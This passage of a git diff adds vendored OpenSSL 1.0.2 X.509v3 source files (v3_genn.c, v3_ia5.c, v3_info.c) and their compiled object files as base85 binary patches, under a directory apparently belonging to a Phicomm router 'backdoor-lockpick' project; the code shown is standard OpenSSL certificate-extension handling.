+    case GEN_X400:
+    case GEN_EDIPARTY:
+        return a->d.other;
+
+    case GEN_OTHERNAME:
+        return a->d.otherName;
+
+    case GEN_EMAIL:
+    case GEN_DNS:
+    case GEN_URI:
+        return a->d.ia5;
+
+    case GEN_DIRNAME:
+        return a->d.dirn;
+
+    case GEN_IPADD:
+        return a->d.ip;
+
+    case GEN_RID:
+        return a->d.rid;
+
+    default:
+        return NULL;
+    }
+}
+
+int GENERAL_NAME_set0_othername(GENERAL_NAME *gen,
+                                ASN1_OBJECT *oid, ASN1_TYPE *value)
+{
+    OTHERNAME *oth;
+    oth = OTHERNAME_new();
+    if (!oth)
+        return 0;
+    oth->type_id = oid;
+    oth->value = value;
+    GENERAL_NAME_set0_value(gen, GEN_OTHERNAME, oth);
+    return 1;
+}
+
+int GENERAL_NAME_get0_otherName(GENERAL_NAME *gen,
+                                ASN1_OBJECT **poid, ASN1_TYPE **pvalue)
+{
+    if (gen->type != GEN_OTHERNAME)
+        return 0;
+    if (poid)
+        *poid = gen->d.otherName->type_id;
+    if (pvalue)
+        *pvalue = gen->d.otherName->value;
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_genn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_genn.o
new file mode 100644
index 0000000000000000000000000000000000000000..7683b733ae66aae65f21fafd2493c92d0361cf4b
GIT binary patch
literal 9528
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ia5.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ia5.c
new file mode 100644
index 0000000..c170a55
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ia5.c
@@ -0,0 +1,119 @@
+/* v3_ia5.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+
+static char *i2s_ASN1_IA5STRING(X509V3_EXT_METHOD *method,
+                                ASN1_IA5STRING *ia5);
+static ASN1_IA5STRING *s2i_ASN1_IA5STRING(X509V3_EXT_METHOD *method,
+                                          X509V3_CTX *ctx, char *str);
+const X509V3_EXT_METHOD v3_ns_ia5_list[] = {
+    EXT_IA5STRING(NID_netscape_base_url),
+    EXT_IA5STRING(NID_netscape_revocation_url),
+    EXT_IA5STRING(NID_netscape_ca_revocation_url),
+    EXT_IA5STRING(NID_netscape_renewal_url),
+    EXT_IA5STRING(NID_netscape_ca_policy_url),
+    EXT_IA5STRING(NID_netscape_ssl_server_name),
+    EXT_IA5STRING(NID_netscape_comment),
+    EXT_END
+};
+
+static char *i2s_ASN1_IA5STRING(X509V3_EXT_METHOD *method,
+                                ASN1_IA5STRING *ia5)
+{
+    char *tmp;
+    if (!ia5 || !ia5->length)
+        return NULL;
+    if (!(tmp = OPENSSL_malloc(ia5->length + 1))) {
+        X509V3err(X509V3_F_I2S_ASN1_IA5STRING, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    memcpy(tmp, ia5->data, ia5->length);
+    tmp[ia5->length] = 0;
+    return tmp;
+}
+
+static ASN1_IA5STRING *s2i_ASN1_IA5STRING(X509V3_EXT_METHOD *method,
+                                          X509V3_CTX *ctx, char *str)
+{
+    ASN1_IA5STRING *ia5;
+    if (!str) {
+        X509V3err(X509V3_F_S2I_ASN1_IA5STRING,
+                  X509V3_R_INVALID_NULL_ARGUMENT);
+        return NULL;
+    }
+    if (!(ia5 = M_ASN1_IA5STRING_new()))
+        goto err;
+    if (!ASN1_STRING_set((ASN1_STRING *)ia5, (unsigned char *)str,
+                         strlen(str))) {
+        M_ASN1_IA5STRING_free(ia5);
+        goto err;
+    }
+#ifdef CHARSET_EBCDIC
+    ebcdic2ascii(ia5->data, ia5->data, ia5->length);
+#endif                          /* CHARSET_EBCDIC */
+    return ia5;
+ err:
+    X509V3err(X509V3_F_S2I_ASN1_IA5STRING, ERR_R_MALLOC_FAILURE);
+    return NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ia5.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ia5.o
new file mode 100644
index 0000000000000000000000000000000000000000..5d018ca41401dd89b87e83ba3799325e049ad0fb
GIT binary patch
literal 3944
zcmcJRUx*t;9LFcgX`^@MQmt}uDnUxIXqW8O!_$Y7y=yLeHQw1IhiEHnF5Q~Y%O7?(
zdZ$p8<AhKTeGz<73i@!Mls@;N4OlFFYYW0X`XDM46g^N8A^v`|^UKXnk{2aEnElP~
zv%lYWCNsOUc{iP%4~IgGEX0nny@)7d<<Y%<ig!~i&c@m9_~U;Yh2@jx=AGtPT5sz&
zubhM1cg<^$fHPa){fx;At?TAy+dFJ--0bLWv-PXl`sMda+15|ypSR7elO3M4*=`;L
z#QVOI0i{>Zz~$N#a7pVw@O#<T_piQYoc_ii8fYFy|HI2)IA*qXH#^>m&W$TCL%z8+
z4Ob>jpgAe&eggNnE>F07z$}fL7u=}Xy0QDES&A6nj*KuI>J$w1=25FsoYqRH7c?^%
z4lP<3nsQM1L@*p$^uo}TgTmQhIJD@+p(zK27lYx@q7K;5#AV^k+}!htCzn^6HLsa?
zPCKe4kLb@fd8nVCN@~ex4*S?I8UYuFb`P}7;xY>})<zbAhIYVrEcAAch1TMs$+3OW
zkKsT&2>elT?;Z5>vG|8!BR26t#E2!r_1J_Fi_gZQn0H*{;X&r-9gj_H@VwKMCsKMG
zo}DA?x4vr^>3g!`+-defxd<q!c0Yiyq{DxUNQ&@P306EN@+pu1rf&Yd!Q?K#Zve;9
zdo997dtj0i+@)TNuxJm&qZ;>BH9RN!@z)3N#sL2Q0RGVc{u%K7Y;S#1VvD{Wkk7iG
z2zRPt8Tm!sS}>;bh1|kohE=9q6=~VIB(pNvrCB3uEzQs8(*>(w%x2RT<HdfZ<*het
zt7g9yfUfNY;<Juzvve+JHJYAfJ5JqUbGcVuDlA#m;_7O>gmbI8_yx08E3T;R&d#cM
z@SE@hi-u3!IJAH8007G%1VfJdKs=8S4EcU&#OnybkUt2G_~!`0;C*Fd(1?G55DfDl
zf=2v0LNHZ_o*aD79_AVTB`NyIaSVFiXA~|%hR+F_s`IIjIhS=VDqMtYN8<8)=oMAx
z6GZ?<+>aPbNnF+`OI)5$L*b;eEpb`rmc(V99fgxl9FxHCwyZNFaakv&a9#|THHphQ
z7bPz1Y%82}5~72*MG7bM|BE>7JJa0ts#jbA?>W9NQ_rzii<)Pzc}zP~^omSdab2c4
zbqp|F*K`Omi4*9-O{SIV)v8^CqFUXvHTd`(alK;coQU73HMNFQZ`h8vE~@Rab=E0X
zZ87!#<q}Yhd$D&S`En`Wu^)veC$^PBHVHj^mr`BgccS8j+7|o)@K{Ul*@WPS1XsUQ
zhtz>YzKWj~n*X(47voO}eR4Fu`o*I0$)`oVIzGL3biR{rf;z&d!1r6f%VMGa5(DA-
z;U1~$mji|=bWTB++j}Sq_LT3sSDH8ZQ*ej+-6ZIICF*5{eKi-q`}?5D?+)f&7WD}X
zB%}Eg+JFvfs`a--eVG!4SL@FM$JCU#Pi|ZMrJ!}e^}~M?R8P-ezp+tcM*PK~^C|`m
ln_7?0hr0KGn2C!5cGY*?tGa&pjq6vxBj&%=t@Jx;{l5#tM|uDN

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_info.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_info.c
new file mode 100644
index 0000000..e052a34
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_info.c
@@ -0,0 +1,210 @@
+/* v3_info.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509v3.h>
+
+static STACK_OF(CONF_VALUE) *i2v_AUTHORITY_INFO_ACCESS(X509V3_EXT_METHOD
+                                                       *method, AUTHORITY_INFO_ACCESS
+                                                       *ainfo, STACK_OF(CONF_VALUE)
+                                                       *ret);
+static AUTHORITY_INFO_ACCESS *v2i_AUTHORITY_INFO_ACCESS(X509V3_EXT_METHOD
+                                                        *method,
+                                                        X509V3_CTX *ctx,
+                                                        STACK_OF(CONF_VALUE)
+                                                        *nval);
+
+const X509V3_EXT_METHOD v3_info = { NID_info_access, X509V3_EXT_MULTILINE,
+    ASN1_ITEM_ref(AUTHORITY_INFO_ACCESS),
+    0, 0, 0, 0,
+    0, 0,
+    (X509V3_EXT_I2V) i2v_AUTHORITY_INFO_ACCESS,
+    (X509V3_EXT_V2I)v2i_AUTHORITY_INFO_ACCESS,
+    0, 0,
+    NULL
+};
+
+const X509V3_EXT_METHOD v3_sinfo = { NID_sinfo_access, X509V3_EXT_MULTILINE,
+    ASN1_ITEM_ref(AUTHORITY_INFO_ACCESS),
+    0, 0, 0, 0,
+    0, 0,
+    (X509V3_EXT_I2V) i2v_AUTHORITY_INFO_ACCESS,
+    (X509V3_EXT_V2I)v2i_AUTHORITY_INFO_ACCESS,
+    0, 0,
+    NULL
+};
+
+ASN1_SEQUENCE(ACCESS_DESCRIPTION) = {
+        ASN1_SIMPLE(ACCESS_DESCRIPTION, method, ASN1_OBJECT),
+        ASN1_SIMPLE(ACCESS_DESCRIPTION, location, GENERAL_NAME)
+} ASN1_SEQUENCE_END(ACCESS_DESCRIPTION)
+
+IMPLEMENT_ASN1_FUNCTIONS(ACCESS_DESCRIPTION)
+
+ASN1_ITEM_TEMPLATE(AUTHORITY_INFO_ACCESS) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, GeneralNames, ACCESS_DESCRIPTION)
+ASN1_ITEM_TEMPLATE_END(AUTHORITY_INFO_ACCESS)
+
+IMPLEMENT_ASN1_FUNCTIONS(AUTHORITY_INFO_ACCESS)
+
+static STACK_OF(CONF_VALUE) *i2v_AUTHORITY_INFO_ACCESS(X509V3_EXT_METHOD
+                                                       *method, AUTHORITY_INFO_ACCESS
+                                                       *ainfo, STACK_OF(CONF_VALUE)
+                                                       *ret)
+{
+    ACCESS_DESCRIPTION *desc;
+    int i, nlen;
+    char objtmp[80], *ntmp;
+    CONF_VALUE *vtmp;
+    for (i = 0; i < sk_ACCESS_DESCRIPTION_num(ainfo); i++) {
+        desc = sk_ACCESS_DESCRIPTION_value(ainfo, i);
+        ret = i2v_GENERAL_NAME(method, desc->location, ret);
+        if (!ret)
+            break;
+        vtmp = sk_CONF_VALUE_value(ret, i);
+        i2t_ASN1_OBJECT(objtmp, sizeof objtmp, desc->method);
+        nlen = strlen(objtmp) + strlen(vtmp->name) + 5;
+        ntmp = OPENSSL_malloc(nlen);
+        if (!ntmp) {
+            X509V3err(X509V3_F_I2V_AUTHORITY_INFO_ACCESS,
+                      ERR_R_MALLOC_FAILURE);
+            return NULL;
+        }
+        BUF_strlcpy(ntmp, objtmp, nlen);
+        BUF_strlcat(ntmp, " - ", nlen);
+        BUF_strlcat(ntmp, vtmp->name, nlen);
+        OPENSSL_free(vtmp->name);
+        vtmp->name = ntmp;
+
+    }
+    if (!ret)
+        return sk_CONF_VALUE_new_null();
+    return ret;
+}
+
+static AUTHORITY_INFO_ACCESS *v2i_AUTHORITY_INFO_ACCESS(X509V3_EXT_METHOD
+                                                        *method,
+                                                        X509V3_CTX *ctx,
+                                                        STACK_OF(CONF_VALUE)
+                                                        *nval)
+{
+    AUTHORITY_INFO_ACCESS *ainfo = NULL;
+    CONF_VALUE *cnf, ctmp;
+    ACCESS_DESCRIPTION *acc;
+    int i, objlen;
+    char *objtmp, *ptmp;
+    if (!(ainfo = sk_ACCESS_DESCRIPTION_new_null())) {
+        X509V3err(X509V3_F_V2I_AUTHORITY_INFO_ACCESS, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    for (i = 0; i < sk_CONF_VALUE_num(nval); i++) {
+        cnf = sk_CONF_VALUE_value(nval, i);
+        if (!(acc = ACCESS_DESCRIPTION_new())
+            || !sk_ACCESS_DESCRIPTION_push(ainfo, acc)) {
+            X509V3err(X509V3_F_V2I_AUTHORITY_INFO_ACCESS,
+                      ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        ptmp = strchr(cnf->name, ';');
+        if (!ptmp) {
+            X509V3err(X509V3_F_V2I_AUTHORITY_INFO_ACCESS,
+                      X509V3_R_INVALID_SYNTAX);
+            goto err;
+        }
+        objlen = ptmp - cnf->name;
+        ctmp.name = ptmp + 1;
+        ctmp.value = cnf->value;
+        if (!v2i_GENERAL_NAME_ex(acc->location, method, ctx, &ctmp, 0))
+            goto err;
+        if (!(objtmp = OPENSSL_malloc(objlen + 1))) {
+            X509V3err(X509V3_F_V2I_AUTHORITY_INFO_ACCESS,
+                      ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        strncpy(objtmp, cnf->name, objlen);
+        objtmp[objlen] = 0;
+        acc->method = OBJ_txt2obj(objtmp, 0);
+        if (!acc->method) {
+            X509V3err(X509V3_F_V2I_AUTHORITY_INFO_ACCESS,
+                      X509V3_R_BAD_OBJECT);
+            ERR_add_error_data(2, "value=", objtmp);
+            OPENSSL_free(objtmp);
+            goto err;
+        }
+        OPENSSL_free(objtmp);
+
+    }
+    return ainfo;
+ err:
+    sk_ACCESS_DESCRIPTION_pop_free(ainfo, ACCESS_DESCRIPTION_free);
+    return NULL;
+}
+
+int i2a_ACCESS_DESCRIPTION(BIO *bp, ACCESS_DESCRIPTION *a)
+{
+    i2a_ASN1_OBJECT(bp, a->method);
+#ifdef UNDEF
+    i2a_GENERAL_NAME(bp, a->location);
+#endif
+    return 2;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_info.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_info.o
new file mode 100644
index 0000000000000000000000000000000000000000..a6dcdf81f46d80b188bb627dfde91ce21e028809
GIT binary patch
literal 7560
zcmc(je{5Sv9l+0ZvKnZebd)Xo)p^Wg>1d6evNdHJ^K<Ov3~mx7&S=@X7bkJ&td1S*
z=Qf3Q?UZ)f!%JJigpfcQQioI_v~}A4s48d!?YeFf12h5MDnTX6MrbA|uy#za@crJq
ztG|AEuVURFe5Lp9?sMP!e(%2b^?UccBa!M{;PEge9`;36YbnZ@@48w&DymU-HCw{|
z(X{M+?JL^-+Cb8LS4$@%X9xPZ`8uDRo#5s@!PL~YV9N-vHr&<<gSZ(F<|5N6^RItK
z6Y(`?n)Z0XTikq0F<!kV$jvu-b=;RUPY5+`9^<>GD~nZQ<_#QczQxU#1xi-0InoO#
zWzKQ)B};4awK?<y;QZg8<<;#ze(~4bd=;8}>Q3|x)I7;A{%UGlv-j{00Oq!!PmHZX
z1^j{c%1w#LbmW!88gw7|CftsG8g7x(LhaoBeE4@M^8=WLHg}wxX*rx%p(dTA%!}4^
zsuiE$HL%@smNF~8nb{BK=J@W@O}nn2gGv=*G{RR|5i=U)dX7UlPd%_fdr;e;J*4T!
zFz(XJ3`|Pw1D{%qRnq>Ht$lA@8}}^{xu6YbY1p*MS<W#C+%$sC+*}&0+qU+|w3tcK
zJkF=$!2oV$%i7&%E6YiYs$gEkNT|*{2wMw#pv}pBgsl}F@il*I+H)Ut;%3Lq3(~OM
zI<ebE6E{z!%(q1sZ2qE}mvez+b<B6<Zt%rrB4K(gvo!VsK4P24&xPvG_}nzFenV_T
zGhaS~D`@3aBj|&X$!Y@D{0m-91zWHqEF6Q~rd_*W^wf6G;TO<~l{|97FN^*m*t8^W
z@bEj33*7vR=+#a%e2zsf!166irWciWzXMxsO?1ori5^`5EM>kQnWlb}35bTo@FTN~
zLaMYoqzX@&XXd5Khf586YW4E!UBc%foa0xIZC<617B&_`!z{2ez&2;{mF&Gt8%Xn>
zzGQm6p6u@I(Y20_M1Mc)$`-PvOujoamMt@j>G4E=M_;lxo$TpmV_73t9AWw5aK;!d
z7QnodK#+wv^<9oNT(0wf=z}a3(rnYkFi^4gtG+#8;G@n#*}9VQc^LHn^nWFD#xXv(
zfn6OPUkJ1g3{?t7C9o#6DimHBSzQs$$fIrHQ26u9Eo>RUwd3A2!qwG1z+m5|k$K@l
zS!xx`^YuRFnP~RhuxO!gA3mCZ-zfVgFbO*S&3hNb{4IODF@IpHA>nU*vN7%tKYo?w
zZ=YP)<v-~0_IUj5fHZ$AsDNtB-yHM9LePIs+ERIf<u(Vl&w)K-V>q`%lAWucTLR}6
z!?|gf<`(zw^mtERW^N5=1BA}4#euDGU{M>xc%~&2u}%1!yD<nZf~pPd{G3y_*YPBR
zd#84<ew5cG)4gK%>vcZ?%>~51*kfR~Nq$JKLBv-M^|GsEtybIzRS)o}M6I&iAb4%v
zy^>?$b;)io!&%K2FIzMp0`W5OP_OI5*NT<xby((FBl~zgW{-(>BlFuhHofz-8G9VK
z$`d-|`!0OH3;(eT|EUXq#f9Tp&}lwzyYP2iI39tW>@0TS*SYXJfL{$6q4G)Di~(N)
zd9oAyqqJKETjyfuVQJ?HC{dK1M_u%vl=|Pb>F;;Ze_rYzu<4(4(f_Rr|Gf+UlMDZs
z3-`c-S*_7pv2|bU!UHaR1#pc2e))({Hamf1{FSKq>r(#(oBmeGkJ<RQC4b$<pOyTN
